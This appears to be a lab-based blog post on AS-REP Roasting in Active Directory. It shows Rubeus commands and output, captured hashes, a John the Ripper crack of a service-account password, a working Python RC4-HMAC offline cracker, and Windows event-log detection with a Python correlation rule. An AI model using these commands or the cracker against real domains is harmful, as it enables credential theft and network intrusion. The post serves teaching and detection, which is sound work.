Hi Guys,
Many articles cover Kerberoasting SPN accounts in Active Directory, which can give an adversary an easy path to a privileged user: request a TGS for a service account and crack the response offline.
I would like to discuss a second, closely related technique that also requests something for an account and takes the response away for offline cracking. Instead of requesting a service ticket (TGS) and cracking the TGS-REP, this technique asks the KDC for a TGT for a user account and cracks the encrypted part of the AS-REP. It is known as AS-REP Roasting.
Ticket Granting Ticket
The TGT was designed into the Kerberos protocol so that the user is not asked for the password repeatedly, and so that neither the password nor the master key derived from it has to be stored on the workstation.
The Ticket Granting Ticket (TGT) is returned in the AS-REP packet. The client then uses the TGT to prove that the user is who she says she is and has authenticated properly. The ticket is valid for a configurable time period (10 hours by default in Active Directory).
Why Pre-authentication ?
By default the KDC requires pre-authentication for all accounts. It is a security feature that protects against password-guessing attacks. The AS-REQ identifies the client to the KDC in plain text. With pre-authentication enabled, the client also sends a timestamp encrypted with a key derived from the user's password (for RC4 that key is the NT hash itself). The KDC decrypts it with the same key, which it holds in Active Directory; if the result is a valid timestamp within the allowed clock skew, the KDC knows that the client really knows the password and that the request is not a replay of an earlier one.
When pre-authentication is not enforced, an attacker can send a bare AS-REQ for the account knowing nothing but the username. The KDC answers with an AS-REP whose encrypted part is protected only by the user's password-derived key, and the attacker can brute-force that part offline.
AS-REP Roasting
AS-REP Roasting is an attack against Kerberos user accounts that do not require pre-authentication. Pre-authentication is the first step of Kerberos authentication and is designed to prevent brute-force password guessing; for an account where it is disabled, the encrypted part of the AS-REP is effectively an offline-crackable hash of the user's password.
We can use Rubeus to send the request:
Rubeus.exe asreproast /user:AppService1 /domain:corp /dc:192.168.100.129
[*] Action: AS-REP roasting
[*] Target User : AppService1
[*] Target Domain : corp
[*] Target DC : 192.168.100.129
[*] Using domain controller: 192.168.100.129
[*] Building AS-REQ (w/o preauth) for: 'corp\AppService1'
[+] AS-REQ w/o preauth successful!
[*] AS-REP hash:
$krb5asrep$AppService1@corp:E5AA2C0539D013373417C2D122E98A02$3B70D7887B633196642
A8CB734C2D8972EE5C95887ACA40E5CBC0F4805D7********69F0AE1C1D6882650F32CB0A011
C776CE605EF322E16CB7A5E686DE49******855642A8E0E6A43282D939C7AE027061EEF3EC2555
812CF35F3DA96AE705BBB7ABAAAE81DD4A453DECD792D59EB5BC246C58995C79B64122DBEE5F536B
68E0C365BBFD6979950E62FA80712B5A9FB*********563834D2C36E5A73C5C088014863956
726BC4B52D177F733203682DE7DD78BE055451EECF2D74D28E3F2E96EDD868EB84CD66019203E20E
E74CDCE9D9B59CA2C5A8B229A29BA049B
Wireshark capture of the AS-REQ. Based on the command above, Rubeus sends the request to the KDC with the account name and no pre-authentication data (no encrypted timestamp).

Wireshark capture of the AS-REP returned by the KDC.

The material to crack is the top-level enc-part of the AS-REP, which is encrypted with the key derived from the user's password (not the enc-part of the ticket inside it, which is encrypted with the krbtgt key). We can compare its bytes with the cipher portion of the Rubeus hash above:

The request above is logged in the Security event log of the domain controller as event ID 4768:

A Kerberos authentication ticket (TGT) was requested.
Account Information:
Account Name: AppService1
Supplied Realm Name: corp
User ID: CORP\AppService1
Service Information:
Service Name: krbtgt
Service ID: CORP\krbtgt
Network Information:
Client Address: ::ffff:192.168.100.128
Client Port: 50154
Additional Information:
Ticket Options: 0x40800010
Result Code: 0x0
Ticket Encryption Type: 0x17
Pre-Authentication Type: 0
Certificate Information:
Certificate Issuer Name:
Certificate Serial Number:
Certificate Thumbprint:
The request succeeds even though I sent it from a Windows host that was not authenticated to the domain at all. This is possible because the account I queried has "Do not require Kerberos preauthentication" set. Two fields in the event give it away: Pre-Authentication Type: 0 (no pre-authentication data in the request) and Ticket Encryption Type: 0x17 (RC4-HMAC, which Rubeus offers as the only encryption type so that the part it takes away is the cheapest one to crack).

If we change the account back to requiring Kerberos pre-authentication and run Rubeus again, it fails with KDC_ERR_PREAUTH_REQUIRED:
C:\Temp\Ghostpack-CompiledBinaries-master>Rubeus.exe asreproast /user:AppService1 /domain:corp /dc:192.168.100.129
[*] Action: AS-REP roasting
[*] Target User : AppService1
[*] Target Domain : corp
[*] Target DC : 192.168.100.129
[*] Using domain controller: 192.168.100.129
[*] Building AS-REQ (w/o preauth) for: 'corp\AppService1'
[X] KRB-ERROR (25) : KDC_ERR_PREAUTH_REQUIRED
In the Kerberos traffic the KDC now answers with KRB5KDC_ERR_PREAUTH_REQUIRED. The KDC expects the AS-REQ to carry a PA-ENC-TIMESTAMP, a timestamp encrypted with the user's key, but the request Rubeus built contains no pre-authentication data at all, so the KDC refuses to issue a ticket and returns error 25 (together with the salt and encryption types a client should use to build a proper pre-authenticated request). Without the user's key, nothing comes back that is useful for offline cracking.

So without the flag we get nothing to crack unless we already hold valid credentials for that account. Fortunately "Do not require Kerberos preauthentication" is off for every account by default (it is the DONT_REQ_PREAUTH bit, 0x400000, of userAccountControl), so an attacker can only request a crackable AS-REP for accounts that an administrator has set up that way by hand, usually for a legacy application. Those accounts should be reviewed, the flag removed where possible, and the ones that must keep it given long random passwords and AES-only encryption types, which does not stop the attack but makes each password guess far more expensive.
Cracking the hash
Once you have the hash, you can crack the password with Hashcat (mode 18200 for this RC4 format) or John the Ripper. I used John for this test:
root@net-dragon:~/box/rioAD# john toCrack.txt --wordlist=passList
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Warning: Only 4 candidates left, minimum 32 needed for performance.
Paasw0RD123 ($krb5asrep$AppService1@corp)
1g 0:00:00:00 DONE (2020-07-03 10:39) 100.0g/s 400.0p/s 400.0c/s 400.0C/s rio..Paasw0RD123
Use the "--show" option to display all of the cracked passwords reliably
Session completed
root@net-dragon:~/box/rioAD#
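To show what John and Hashcat actually do with that line, here is an added example that is not part of the original post and not code from Rubeus, John or Hashcat. It implements the etype 23 (RC4-HMAC) check in Python: the NT hash is MD4 of the UTF-16LE password; RFC 4757 derives K1 = HMAC-MD5(NT hash, T) with the message-type constant T = 8 that Windows uses for the AS-REP enc-part, K3 = HMAC-MD5(K1, checksum), RC4 under K3 decrypts the cipher part, and a candidate is correct when HMAC-MD5(K1) over the decrypted confounder plus data equals the 16-byte checksum carried before the `$`. The hash line, the plaintext standing in for the DER-encoded EncASRepPart, the confounder and the wordlist are constructed here; the password is the one cracked above. MD4 is written out because hashlib's md4 is disabled in many OpenSSL 3 builds.

```python
"""Offline crack of an etype-23 (RC4-HMAC) AS-REP in the $krb5asrep$ format Rubeus emits."""
import hashlib
import hmac
import os
import struct

MASK = 0xFFFFFFFF
AS_REP_USAGE = struct.pack("<I", 8)  # RFC 4757 "T" value Windows uses for the AS-REP enc-part


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); NT hash = md4(password.encode('utf-16le'))."""
    rotl = lambda x, n: (((x & MASK) << n) | ((x & MASK) >> (32 - n))) & MASK
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    msg = data + b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", 8 * len(data))
    st = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    r2 = [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15]
    r3 = [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = st
        for i in range(16):  # round 1
            a, b, c, d = d, rotl(a + F(b, c, d) + X[i], (3, 7, 11, 19)[i % 4]), b, c
        for i in range(16):  # round 2
            a, b, c, d = d, rotl(a + G(b, c, d) + X[r2[i]] + 0x5A827999, (3, 5, 9, 13)[i % 4]), b, c
        for i in range(16):  # round 3
            a, b, c, d = d, rotl(a + H(b, c, d) + X[r3[i]] + 0x6ED9EBA1, (3, 9, 11, 15)[i % 4]), b, c
        st = [(s + v) & MASK for s, v in zip(st, (a, b, c, d))]
    return struct.pack("<4I", *st)


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 stream cipher (KSA + PRGA)."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def hmac_md5(key: bytes, msg: bytes) -> bytes:
    return hmac.new(key, msg, hashlib.md5).digest()


def rc4_hmac_encrypt(nt_hash: bytes, plaintext: bytes, confounder: bytes = None):
    """RFC 4757 encryption of an AS-REP enc-part; returns (checksum, ciphertext) as a KDC would."""
    k1 = hmac_md5(nt_hash, AS_REP_USAGE)
    conf_plain = (confounder or os.urandom(8)) + plaintext
    checksum = hmac_md5(k1, conf_plain)
    k3 = hmac_md5(k1, checksum)
    return checksum, rc4(k3, conf_plain)


def asrep_hash_line(user: str, realm: str, checksum: bytes, cipher: bytes) -> str:
    """John's layout as shown in the post: $krb5asrep$user@realm:checksum$cipher."""
    return f"$krb5asrep${user}@{realm}:{checksum.hex().upper()}${cipher.hex().upper()}"


def parse_asrep_hash(line: str):
    """Accepts John's layout and Hashcat's $krb5asrep$23$... variant."""
    assert line.startswith("$krb5asrep$"), "not an AS-REP hash line"
    body = line[len("$krb5asrep$"):]
    if body.startswith("23$"):
        body = body[3:]
    ident, rest = body.split(":", 1)
    checksum_hex, cipher_hex = rest.split("$", 1)
    user, realm = ident.split("@", 1)
    return user, realm, bytes.fromhex(checksum_hex), bytes.fromhex(cipher_hex)


def crack_asrep(line: str, wordlist):
    """Return the first candidate whose NT hash authenticates the decrypted enc-part, else None."""
    _, _, checksum, cipher = parse_asrep_hash(line)
    for pw in wordlist:
        k1 = hmac_md5(md4(pw.encode("utf-16le")), AS_REP_USAGE)
        plain = rc4(hmac_md5(k1, checksum), cipher)
        if hmac.compare_digest(hmac_md5(k1, plain), checksum):
            return pw
    return None


# Constructed sample (not the capture from the post): a stand-in EncASRepPart encrypted under
# the NT hash of the cracked password, with a zero confounder so the line is reproducible.
SAMPLE_PASSWORD = "Paasw0RD123"
SAMPLE_PLAINTEXT = b"\x79\x81\x00stand-in for the DER EncASRepPart (session key, flags, times)"
_chk, _ct = rc4_hmac_encrypt(md4(SAMPLE_PASSWORD.encode("utf-16le")), SAMPLE_PLAINTEXT, bytes(8))
SAMPLE_LINE = asrep_hash_line("AppService1", "corp", _chk, _ct)
WORDLIST = ["rio", "Password1", "Winter2020!", "Paasw0RD123"]

if __name__ == "__main__":
    print(SAMPLE_LINE)
    print("cracked:", crack_asrep(SAMPLE_LINE, WORDLIST))
```

The real crackers skip the full HMAC for most candidates and first check that the decrypted bytes start with the ASN.1 header of EncASRepPart, which is why Hashcat reaches billions of guesses per second on RC4; the per-guess cost here is one MD4 and three HMAC-MD5 calls, with no salt and no iteration, which is exactly what makes AS-REP Roasting with RC4 so cheap compared with the PBKDF2 work that etype 17/18 requires.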
How to find the accounts
Rubeus can also find the accounts with "Do not require Kerberos preauthentication" set, so you do not have to guess names. Given domain credentials it queries LDAP for users whose userAccountControl has the DONT_REQ_PREAUTH bit (0x400000) set and then roasts each of them in one go. Here is the command:
C:\Temp\Ghostpack-CompiledBinaries-master>Rubeus.exe asreproast /creduser:corp.local\netman /credpassword:PasPas! /domain:corp /dc:192.168.100.129
[*] Action: AS-REP roasting
[*] Target Domain : corp
[*] Target DC : 192.168.100.129
[*] Using alternate creds : corp.local\administrator
[*] Searching path 'LDAP://corp.local' for AS-REP roastable users
[*] SamAccountName : AppService1
[*] DistinguishedName : CN=AppService1,OU=Service Account,OU=North America,OU=Americas,OU=Global,DC=corp,DC=local
[*] Using domain controller: 192.168.100.129
[*] Building AS-REQ (w/o preauth) for: 'corp\AppService1'
[+] AS-REQ w/o preauth successful!
[*] AS-REP hash:
$krb5asrep$AppService1@corp:6C525FFD85785134CBDFFA2B94EB46EC$64F98252612F2F81099
15C858D86A721E73EE48F1A7BFFFF4B9390AC5AB2CD6DEE**********E696F0268683DC1DAD64050
EF1A172C682AFAAD519EED027A38E650402A5234646424A9AFD8DD7E91F9B1B498FAD127C2A73CA4
2BD09840C6A5615B02C657EE6F086B0277**********B93B121E421EAC36F65FCFACD56439288BEC
BFE235B3533E08C62D423ADAFD50AB360F38F1041A67F979A8D87B5266860FCCC406ACEE34D1888B
0ADE93E41D1C8DFD1698CABBE2CBE84B2BB3E974C0BFBBDD92D3D09BE73F6C539B92517F3A74CCA0
1E0F7943D6E8D4CA6D7439EDCA6B0373D
The Windows Security event log on the domain controller records the sequence below. If your SIEM can correlate sequences of events, this pattern (an NTLM credential validation and an LDAP lookup against the DC from one source address, followed within seconds by a 4768 with Pre-Authentication Type 0 for a different account from the same address) identifies the account enumeration and the roast that follows it:

1. Credential Validation ID = 4776, verification of the requester account netman:
The computer attempted to validate the credentials for an account.
Authentication Package: MICROSOFT_AUTHENTICATION_PACKAGE_V1_0
Logon Account: netman
Source Workstation: DESKTOP-C85128F
Error Code: 0x0
2. Logon ID = 4624, netman logs on over NTLM:
An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: CORP\netman
Account Name: netman
Account Domain: CORP
Logon ID: 0x17C0D9
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: DESKTOP-C85128F
Source Network Address: 192.168.100.128
Source Port: 49733
Detailed Authentication Information:
Logon Process: NtLmSsp
Authentication Package: NTLM
Transited Services: -
Package Name (NTLM only): NTLM V2
Key Length: 128
3. Kerberos Authentication Service ID = 4768, TGT for netman created as part of netman's own authentication (note Pre-Authentication Type: 2, an encrypted timestamp was supplied):
A Kerberos authentication ticket (TGT) was requested.
Account Information:
Account Name: netman
Supplied Realm Name: corp.local
User ID: CORP\netman
Service Information:
Service Name: krbtgt
Service ID: CORP\krbtgt
Network Information:
Client Address: ::ffff:192.168.100.128
Client Port: 49736
Additional Information:
Ticket Options: 0x40810010
Result Code: 0x0
Ticket Encryption Type: 0x12
Pre-Authentication Type: 2
Certificate Information:
Certificate Issuer Name:
Certificate Serial Number:
Certificate Thumbprint:
4. Kerberos Service Ticket Operation ID = 4769, TGS requested by netman for DC$, the domain controller's computer account, which backs the LDAP search:
A Kerberos service ticket was requested.
Account Information:
Account Name: netman@CORP.LOCAL
Account Domain: CORP.LOCAL
Logon GUID: {8be78462-4a24-e132-a39a-b601813d00d3}
Service Information:
Service Name: DC$
Service ID: CORP\DC$
Network Information:
Client Address: ::ffff:192.168.100.128
Client Port: 49737
Additional Information:
Ticket Options: 0x40800000
Ticket Encryption Type: 0x12
Failure Code: 0x0
Transited Services: -
5. Logon ID = 4624 for netman, this time over Kerberos:
An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: CORP\netman
Account Name: netman
Account Domain: CORP.LOCAL
Logon ID: 0x17C0F7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {8be78462-4a24-e132-a39a-b601813d00d3}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: 192.168.100.128
Source Port: 49734
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
6. Kerberos Authentication Service ID = 4768 for AppService1, the roast itself (Pre-Authentication Type: 0, Ticket Encryption Type: 0x17):
A Kerberos authentication ticket (TGT) was requested.
Account Information:
Account Name: AppService1
Supplied Realm Name: corp
User ID: CORP\AppService1
Service Information:
Service Name: krbtgt
Service ID: CORP\krbtgt
Network Information:
Client Address: ::ffff:192.168.100.128
Client Port: 49738
Additional Information:
Ticket Options: 0x40800010
Result Code: 0x0
Ticket Encryption Type: 0x17
Pre-Authentication Type: 0
Certificate Information:
Certificate Issuer Name:
Certificate Serial Number:
Certificate Thumbprint:
7. Logoff ID = 4634
8. Logoff ID = 4634
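The two detection points on this page, the single 4768 with Pre-Authentication Type 0 after the first Rubeus run and the enumerate-then-roast sequence above, can both be expressed as a small correlation rule. The following is an added example and not part of the original post or of any SIEM product: it parses events laid out with the same field names as the events above and flags a successful 4768 with Pre-Authentication Type 0, notes whether the ticket was RC4 (0x17), and checks whether the same client address obtained a service ticket for the DC's computer account shortly before. The sample events, the Event ID and Time lines (which a real export carries in the event header rather than the message body) and the DC account name DC$ are constructed assumptions of this example.

```python
"""Correlation rule for AS-REP roasting over Windows Security log text (constructed samples)."""
from datetime import datetime, timedelta

# Constructed events in the field layout the post shows; not a real export.
SAMPLE_EVENTS = """
Event ID: 4768
Time: 2020-07-03 10:30:01
Account Name: netman
Client Address: ::ffff:192.168.100.128
Result Code: 0x0
Ticket Encryption Type: 0x12
Pre-Authentication Type: 2
---
Event ID: 4769
Time: 2020-07-03 10:30:02
Account Name: netman@CORP.LOCAL
Service Name: DC$
Client Address: ::ffff:192.168.100.128
Failure Code: 0x0
---
Event ID: 4768
Time: 2020-07-03 10:30:03
Account Name: AppService1
Client Address: ::ffff:192.168.100.128
Result Code: 0x0
Ticket Encryption Type: 0x17
Pre-Authentication Type: 0
---
Event ID: 4768
Time: 2020-07-03 11:00:00
Account Name: jdoe
Client Address: ::ffff:192.168.100.50
Result Code: 0x0
Ticket Encryption Type: 0x12
Pre-Authentication Type: 2
---
Event ID: 4768
Time: 2020-07-03 12:15:00
Account Name: LegacyApp
Client Address: ::ffff:192.168.100.77
Result Code: 0x0
Ticket Encryption Type: 0x12
Pre-Authentication Type: 0
"""

DC_ACCOUNTS = {"DC$"}  # computer account(s) of the domain controllers; assumed name


def parse_events(text):
    """Split the dump into dicts of 'Field: value' pairs. Only the first ':' separates key
    from value, so IPv6-mapped addresses such as ::ffff:192.168.100.128 survive intact."""
    events = []
    for block in text.strip().split("---"):
        ev = {}
        for line in block.strip().splitlines():
            key, _, value = line.partition(":")
            ev[key.strip()] = value.strip()
        if ev:
            ev["Time"] = datetime.fromisoformat(ev["Time"])
            events.append(ev)
    return events


def find_asrep_roasting(events, window=timedelta(minutes=5)):
    """Rule 1: a successful 4768 (Result Code 0x0) with Pre-Authentication Type 0 means the
    account has DONT_REQ_PREAUTH set and its AS-REP enc-part has just been handed out; an RC4
    ticket (0x17) on top of that is the Rubeus default, not what a current Windows client asks for.
    Rule 2: a 4769 for the DC's own computer account from the same client address within the
    window is the LDAP enumeration step of 'Rubeus asreproast /creduser'."""
    alerts = []
    for ev in events:
        if ev.get("Event ID") != "4768" or ev.get("Result Code") != "0x0":
            continue
        if ev.get("Pre-Authentication Type") != "0":
            continue
        enumeration_first = any(
            p.get("Event ID") == "4769"
            and p.get("Service Name") in DC_ACCOUNTS
            and p.get("Client Address") == ev["Client Address"]
            and timedelta(0) <= ev["Time"] - p["Time"] <= window
            for p in events
        )
        alerts.append({
            "account": ev["Account Name"],
            "client": ev["Client Address"],
            "rc4": ev.get("Ticket Encryption Type") == "0x17",
            "enumeration_first": enumeration_first,
        })
    return alerts


if __name__ == "__main__":
    for alert in find_asrep_roasting(parse_events(SAMPLE_EVENTS)):
        print(alert)
```

Run against the samples, the rule raises two alerts: AppService1 from 192.168.100.128 with RC4 and a preceding DC lookup (the Rubeus sequence), and LegacyApp with AES and no enumeration, which is what a legitimately configured legacy application looks like and is worth a lower severity or an allow-list entry rather than silence, since that account is roastable by anyone who learns its name.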